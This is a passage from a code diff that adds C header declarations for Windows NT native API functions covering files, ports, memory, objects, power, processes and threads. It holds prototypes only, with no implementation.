AtomName, + IN ULONG Length, + OUT OPTIONAL PRTL_ATOM Atom + ); + + +NTSTATUS +NTAPI +NtFindAtom ( + IN OPTIONAL PWSTR AtomName, + IN ULONG Length, + OUT OPTIONAL PRTL_ATOM Atom + ); + + +NTSTATUS +NTAPI +NtDeleteAtom ( + IN RTL_ATOM Atom + ); + + +NTSTATUS +NTAPI +NtQueryInformationAtom( + IN RTL_ATOM Atom, + IN ATOM_INFORMATION_CLASS AtomInformationClass, + OUT OPTIONAL PVOID AtomInformation, + IN ULONG AtomInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtCancelIoFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSTATUS +NTAPI +NtCreateNamedPipeFile ( + OUT PHANDLE FileHandle, + IN ULONG DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN ULONG NamedPipeType, + IN ULONG ReadMode, + IN ULONG CompletionMode, + IN ULONG MaximumInstances, + IN ULONG InboundQuota, + IN ULONG OutboundQuota, + IN OPTIONAL PLARGE_INTEGER DefaultTimeout + ); + + +NTSTATUS +NTAPI +NtCreateMailslotFile ( + OUT PHANDLE FileHandle, + IN ULONG DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CreateOptions, + IN ULONG MailslotQuota, + IN ULONG MaximumMessageSize, + IN PLARGE_INTEGER ReadTimeout + ); + + +NTSTATUS +NTAPI +NtDeleteFile ( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtFlushBuffersFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSTATUS +NTAPI +NtNotifyChangeDirectoryFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree + ); + + +NTSTATUS +NTAPI +NtQueryAttributesFile ( + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PFILE_BASIC_INFORMATION FileInformation + ); + + +NTSTATUS +NTAPI +NtQueryFullAttributesFile( + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PFILE_NETWORK_OPEN_INFORMATION FileInformation + ); + + +NTSTATUS +NTAPI +NtQueryEaFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList, + IN ULONG EaListLength, + IN OPTIONAL PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSTATUS +NTAPI +NtCreateFile ( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN OPTIONAL PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN OPTIONAL PVOID EaBuffer, + IN ULONG EaLength + ); + + +NTSTATUS +NTAPI +NtDeviceIoControlFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSTATUS +NTAPI +NtFsControlFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG FsControlCode, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSTATUS +NTAPI +NtLockFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER ByteOffset, + IN PLARGE_INTEGER Length, + IN ULONG Key, + IN BOOLEAN FailImmediately, + IN BOOLEAN ExclusiveLock + ); + + +NTSTATUS +NTAPI +NtOpenFile ( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + +NTSTATUS +NTAPI +NtQueryDirectoryFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN OPTIONAL PUNICODE_STRING FileName, + IN BOOLEAN RestartScan + ); + + +NTSTATUS +NTAPI +NtQueryInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSTATUS +NTAPI +NtQueryQuotaInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN OPTIONAL PVOID SidList, + IN ULONG SidListLength, + IN OPTIONAL PSID StartSid, + IN BOOLEAN RestartScan + ); + + +NTSTATUS +NTAPI +NtQueryVolumeInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSTATUS +NTAPI +NtReadFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + +NTSTATUS +NTAPI +NtSetInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSTATUS +NTAPI +NtSetQuotaInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length + ); + + +NTSTATUS +NTAPI +NtSetVolumeInformationFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSTATUS +NTAPI +NtWriteFile ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + +NTSTATUS +NTAPI +NtUnlockFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER ByteOffset, + IN PLARGE_INTEGER Length, + IN ULONG Key + ); + + +NTSTATUS +NTAPI +NtReadFileScatter ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PFILE_SEGMENT_ELEMENT SegmentArray, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + +NTSTATUS +NTAPI +NtSetEaFile ( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length + ); + + +NTSTATUS +NTAPI +NtWriteFileGather ( + IN HANDLE FileHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PFILE_SEGMENT_ELEMENT SegmentArray, + IN ULONG Length, + IN OPTIONAL PLARGE_INTEGER ByteOffset, + IN OPTIONAL PULONG Key + ); + + +NTSTATUS +NTAPI +NtLoadDriver ( + IN PUNICODE_STRING DriverServiceName + ); + + +NTSTATUS +NTAPI +NtUnloadDriver ( + IN PUNICODE_STRING DriverServiceName + ); + + +NTSTATUS +NTAPI +NtCreateIoCompletion ( + OUT PHANDLE IoCompletionHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG Count OPTIONAL + ); + + +NTSTATUS +NTAPI +NtOpenIoCompletion ( + OUT PHANDLE IoCompletionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQueryIoCompletion ( + IN HANDLE IoCompletionHandle, + IN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass, + OUT PVOID IoCompletionInformation, + IN ULONG IoCompletionInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetIoCompletion ( + IN HANDLE IoCompletionHandle, + IN PVOID KeyContext, + IN OPTIONAL PVOID ApcContext, + IN NTSTATUS IoStatus, + IN ULONG_PTR IoStatusInformation + ); + + +NTSTATUS +NTAPI +NtRemoveIoCompletion ( + IN HANDLE IoCompletionHandle, + OUT PVOID *KeyContext, + OUT PVOID *ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtCallbackReturn ( + IN PVOID OutputBuffer OPTIONAL, + IN ULONG OutputLength, + IN NTSTATUS Status + ); + + +NTSTATUS +NTAPI +NtQueryDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level + ); + + +NTSTATUS +NTAPI +NtSetDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level, + IN BOOLEAN State + ); + + +NTSTATUS +NTAPI +NtYieldExecution ( + VOID + ); + + +NTSTATUS +NTAPI +NtCreatePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN OPTIONAL ULONG MaxPoolUsage + ); + + +NTSTATUS +NTAPI +NtCreateWaitablePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN OPTIONAL ULONG MaxPoolUsage + ); + + +NTSTATUS +NTAPI +NtConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT OPTIONAL PPORT_VIEW ClientView, + IN OUT OPTIONAL PREMOTE_PORT_VIEW ServerView, + OUT OPTIONAL PULONG MaxMessageLength, + IN OUT OPTIONAL PVOID ConnectionInformation, + IN OUT OPTIONAL PULONG ConnectionInformationLength + ); + + +NTSTATUS +NTAPI +NtSecureConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT OPTIONAL PPORT_VIEW ClientView, + IN OPTIONAL PSID RequiredServerSid, + IN OUT OPTIONAL PREMOTE_PORT_VIEW ServerView, + OUT OPTIONAL PULONG MaxMessageLength, + IN OUT OPTIONAL PVOID ConnectionInformation, + IN OUT OPTIONAL PULONG ConnectionInformationLength + ); + + +NTSTATUS +NTAPI +NtListenPort( + IN HANDLE PortHandle, + OUT PPORT_MESSAGE ConnectionRequest + ); + + +NTSTATUS +NTAPI +NtAcceptConnectPort( + OUT PHANDLE PortHandle, + IN OPTIONAL PVOID PortContext, + IN PPORT_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT OPTIONAL PPORT_VIEW ServerView, + OUT OPTIONAL PREMOTE_PORT_VIEW ClientView + ); + + +NTSTATUS +NTAPI +NtCompleteConnectPort( + IN HANDLE PortHandle + ); + + +NTSTATUS +NTAPI +NtRequestPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage + ); + + +NTSTATUS +NTAPI +NtRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + +NTSTATUS +NTAPI +NtReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE ReplyMessage + ); + + +NTSTATUS +NTAPI +NtReplyWaitReplyPort( + IN HANDLE PortHandle, + IN OUT PPORT_MESSAGE ReplyMessage + ); + + +NTSTATUS +NTAPI +NtReplyWaitReceivePort( + IN HANDLE PortHandle, + OUT OPTIONAL PVOID *PortContext , + IN OPTIONAL PPORT_MESSAGE ReplyMessage, + OUT PPORT_MESSAGE ReceiveMessage + ); + + +NTSTATUS +NTAPI +NtReplyWaitReceivePortEx( + IN HANDLE PortHandle, + OUT OPTIONAL PVOID *PortContext, + IN OPTIONAL PPORT_MESSAGE ReplyMessage, + OUT PPORT_MESSAGE ReceiveMessage, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtImpersonateClientOfPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message + ); + + +NTSTATUS +NTAPI +NtReadRequestData( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message, + IN ULONG DataEntryIndex, + OUT PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesRead + ); + + +NTSTATUS +NTAPI +NtWriteRequestData( + IN HANDLE PortHandle, + IN PPORT_MESSAGE Message, + IN ULONG DataEntryIndex, + IN PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesWritten + ); + + +NTSTATUS +NTAPI +NtQueryInformationPort( + IN HANDLE PortHandle, + IN PORT_INFORMATION_CLASS PortInformationClass, + OUT PVOID PortInformation, + IN ULONG Length, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtCreateSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PLARGE_INTEGER MaximumSize, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN OPTIONAL HANDLE FileHandle + ); + + +NTSTATUS +NTAPI +NtOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG_PTR ZeroBits, + IN SIZE_T CommitSize, + IN OUT OPTIONAL PLARGE_INTEGER SectionOffset, + IN OUT PSIZE_T ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Win32Protect + ); + + +NTSTATUS +NTAPI +NtUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + +NTSTATUS +NTAPI +NtExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER NewSectionSize + ); + + +NTSTATUS +NTAPI +NtAreMappedFilesTheSame ( + IN PVOID File1MappedAsAnImage, + IN PVOID File2MappedAsFile + ); + + +NTSTATUS +NTAPI +NtAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG_PTR ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSTATUS +NTAPI +NtFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG FreeType + ); + + +NTSTATUS +NTAPI +NtReadVirtualMemory ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + OUT PVOID Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesRead + ); + + +NTSTATUS +NTAPI +NtWriteVirtualMemory ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + IN CONST VOID *Buffer, + IN SIZE_T BufferSize, + OUT OPTIONAL PSIZE_T NumberOfBytesWritten + ); + + +NTSTATUS +NTAPI +NtFlushVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + OUT PIO_STATUS_BLOCK IoStatus + ); + + +NTSTATUS +NTAPI +NtLockVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG MapType + ); + + +NTSTATUS +NTAPI +NtUnlockVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG MapType + ); + + +NTSTATUS +NTAPI +NtProtectVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + IN ULONG NewProtect, + OUT PULONG OldProtect + ); + + +NTSTATUS +NTAPI +NtQueryVirtualMemory ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN MEMORY_INFORMATION_CLASS MemoryInformationClass, + OUT PVOID MemoryInformation, + IN SIZE_T MemoryInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + + +NTSTATUS +NTAPI +NtQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN SIZE_T SectionInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + + +NTSTATUS +NTAPI +NtMapUserPhysicalPages ( + IN PVOID VirtualAddress, + IN ULONG_PTR NumberOfPages, + IN OPTIONAL PULONG_PTR UserPfnArray + ); + + +NTSTATUS +NTAPI +NtMapUserPhysicalPagesScatter ( + IN PVOID *VirtualAddresses, + IN ULONG_PTR NumberOfPages, + IN OPTIONAL PULONG_PTR UserPfnArray + ); + + +NTSTATUS +NTAPI +NtAllocateUserPhysicalPages ( + IN HANDLE ProcessHandle, + IN OUT PULONG_PTR NumberOfPages, + OUT PULONG_PTR UserPfnArray + ); + + +NTSTATUS +NTAPI +NtFreeUserPhysicalPages ( + IN HANDLE ProcessHandle, + IN OUT PULONG_PTR NumberOfPages, + IN PULONG_PTR UserPfnArray + ); + + +NTSTATUS +NTAPI +NtGetWriteWatch ( + IN HANDLE ProcessHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + IN SIZE_T RegionSize, + OUT PVOID *UserAddressArray, + IN OUT PULONG_PTR EntriesInUserAddressArray, + OUT PULONG Granularity + ); + + +NTSTATUS +NTAPI +NtResetWriteWatch ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN SIZE_T RegionSize + ); + + +NTSTATUS +NTAPI +NtCreatePagingFile ( + IN PUNICODE_STRING PageFileName, + IN PLARGE_INTEGER MinimumSize, + IN PLARGE_INTEGER MaximumSize, + IN ULONG Priority + ); + + +NTSTATUS +NTAPI +NtFlushInstructionCache ( + IN HANDLE ProcessHandle, + IN OPTIONAL PVOID BaseAddress, + IN SIZE_T Length + ); + + +NTSTATUS +NTAPI +NtFlushWriteBuffer ( + VOID + ); + + +NTSTATUS +NTAPI +NtQueryObject ( + IN HANDLE Handle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + OUT PVOID ObjectInformation, + IN ULONG ObjectInformationLength, + OUT PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetInformationObject ( + IN HANDLE Handle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + IN PVOID ObjectInformation, + IN ULONG ObjectInformationLength + ); + + +NTSTATUS +NTAPI +NtDuplicateObject ( + IN HANDLE SourceProcessHandle, + IN HANDLE SourceHandle, + IN OPTIONAL HANDLE TargetProcessHandle, + OUT PHANDLE TargetHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Options + ); + + +NTSTATUS +NTAPI +NtMakeTemporaryObject ( + IN HANDLE Handle + ); + + +NTSTATUS +NTAPI +NtMakePermanentObject ( + IN HANDLE Handle + ); + + +NTSTATUS +NTAPI +NtSignalAndWaitForSingleObject ( + IN HANDLE SignalHandle, + IN HANDLE WaitHandle, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handles[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtWaitForMultipleObjects32 ( + IN ULONG Count, + IN LONG Handles[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN OPTIONAL PLARGE_INTEGER Timeout + ); + + +NTSTATUS +NTAPI +NtSetSecurityObject ( + IN HANDLE Handle, + IN SECURITY_INFORMATION SecurityInformation, + IN PSECURITY_DESCRIPTOR SecurityDescriptor + ); + + +NTSTATUS +NTAPI +NtQuerySecurityObject ( + IN HANDLE Handle, + IN SECURITY_INFORMATION SecurityInformation, + OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG Length, + OUT PULONG LengthNeeded + ); + + +NTSTATUS +NTAPI +NtClose ( + IN HANDLE Handle + ); + + +NTSTATUS +NTAPI +NtCreateDirectoryObject ( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtOpenDirectoryObject ( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQueryDirectoryObject ( + IN HANDLE DirectoryHandle, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN BOOLEAN RestartScan, + IN OUT PULONG Context, + OUT PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtCreateSymbolicLinkObject ( + OUT PHANDLE LinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PUNICODE_STRING LinkTarget + ); + + +NTSTATUS +NTAPI +NtOpenSymbolicLinkObject ( + OUT PHANDLE LinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQuerySymbolicLinkObject ( + IN HANDLE LinkHandle, + IN OUT PUNICODE_STRING LinkTarget, + OUT PULONG ReturnedLength + ); + + +NTSTATUS +NTAPI +NtGetPlugPlayEvent ( + IN HANDLE EventHandle, + IN OPTIONAL PVOID Context, + OUT PPLUGPLAY_EVENT_BLOCK EventBlock, + IN ULONG EventBufferSize + ); + + +NTSTATUS +NTAPI +NtPlugPlayControl( + IN PLUGPLAY_CONTROL_CLASS PnPControlClass, + IN OUT PVOID PnPControlData, + IN ULONG PnPControlDataLength + ); + + +NTSTATUS +NTAPI +NtPowerInformation( + IN POWER_INFORMATION_LEVEL InformationLevel, + IN OPTIONAL PVOID InputBuffer, + IN ULONG InputBufferLength, + OUT OPTIONAL PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSTATUS +NTAPI +NtSetThreadExecutionState( + IN EXECUTION_STATE esFlags, // ES_xxx flags + OUT EXECUTION_STATE *PreviousFlags + ); + + +NTSTATUS +NTAPI +NtRequestWakeupLatency( + IN LATENCY_TIME latency + ); + + +// NTSTATUS +// NTAPI +// NtInitiatePowerAction( +// IN POWER_ACTION SystemAction, +// IN SYSTEM_POWER_STATE MinSystemState, +// IN ULONG Flags, // POWER_ACTION_xxx flags +// IN BOOLEAN Asynchronous +// ); + + +// NTSTATUS +// NTAPI +// NtSetSystemPowerState( +// IN POWER_ACTION SystemAction, +// IN SYSTEM_POWER_STATE MinSystemState, +// IN ULONG Flags // POWER_ACTION_xxx flags +// ); + + +// NTSTATUS +// NTAPI +// NtGetDevicePowerState( +// IN HANDLE Device, +// OUT DEVICE_POWER_STATE *State +// ); + + +NTSTATUS +NTAPI +NtCancelDeviceWakeupRequest( + IN HANDLE Device + ); + + +NTSTATUS +NTAPI +NtRequestDeviceWakeup( + IN HANDLE Device + ); + + +NTSTATUS +NTAPI +NtCreateProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ParentProcess, + IN BOOLEAN InheritObjectTable, + IN OPTIONAL HANDLE SectionHandle, + IN OPTIONAL HANDLE DebugPort, + IN OPTIONAL HANDLE ExceptionPort + ); + + +NTSTATUS +NTAPI +NtCreateProcessEx( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ParentProcess, + IN ULONG Flags, + IN OPTIONAL HANDLE SectionHandle, + IN OPTIONAL HANDLE DebugPort, + IN OPTIONAL HANDLE ExceptionPort, + IN ULONG JobMemberLevel + ); + + +NTSTATUS +NTAPI +NtOpenProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PCLIENT_ID ClientId + ); + + +NTSTATUS +NTAPI +NtTerminateProcess ( + IN OPTIONAL HANDLE ProcessHandle, + IN NTSTATUS ExitStatus + ); + + +NTSTATUS +NTAPI +NtQueryInformationProcess ( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtGetNextProcess ( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Flags, + OUT PHANDLE NewProcessHandle + ); + + +NTSTATUS +NTAPI +NtGetNextThread ( + IN HANDLE ProcessHandle, + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Flags, + OUT PHANDLE NewThreadHandle + ); + + +NTSTATUS +NTAPI +NtQueryPortInformationProcess ( + VOID + ); + + +NTSTATUS +NTAPI +NtSetInformationProcess ( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength + ); + +NTSTATUS +NTAPI +NtCreateThreadEx ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ProcessHandle, + IN LPVOID StartRoutine, + IN LPVOID Argument, + IN ULONG CreateFlags, + IN ULONG_PTR ZeroBits, + IN SIZE_T CommitSize, + IN SIZE_T MaximumStackSize, + IN LPVOID AttributeList +); + + +NTSTATUS +NTAPI +NtCreateThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN HANDLE ProcessHandle, + OUT PCLIENT_ID ClientId, + IN PCONTEXT ThreadContext, + IN PINITIAL_TEB InitialTeb, + IN BOOLEAN CreateSuspended + ); + + +NTSTATUS +NTAPI +NtOpenThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN OPTIONAL PCLIENT_ID ClientId + ); + + +NTSTATUS +NTAPI +NtTerminateThread ( + IN OPTIONAL HANDLE ThreadHandle, + IN NTSTATUS ExitStatus + ); + + +NTSTATUS +NTAPI +NtSuspendThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + +NTSTATUS +NTAPI +NtResumeThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + +NTSTATUS +NTAPI +NtSuspendProcess ( + HANDLE ProcessHandle + ); + + +NTSTATUS +NTAPI +NtResumeProcess ( + IN HANDLE ProcessHandle + ); + + +NTSTATUS +NTAPI +NtGetContextThread ( + IN HANDLE ThreadHandle, + IN OUT PCONTEXT ThreadContext + ); + + +NTSTATUS +NTAPI 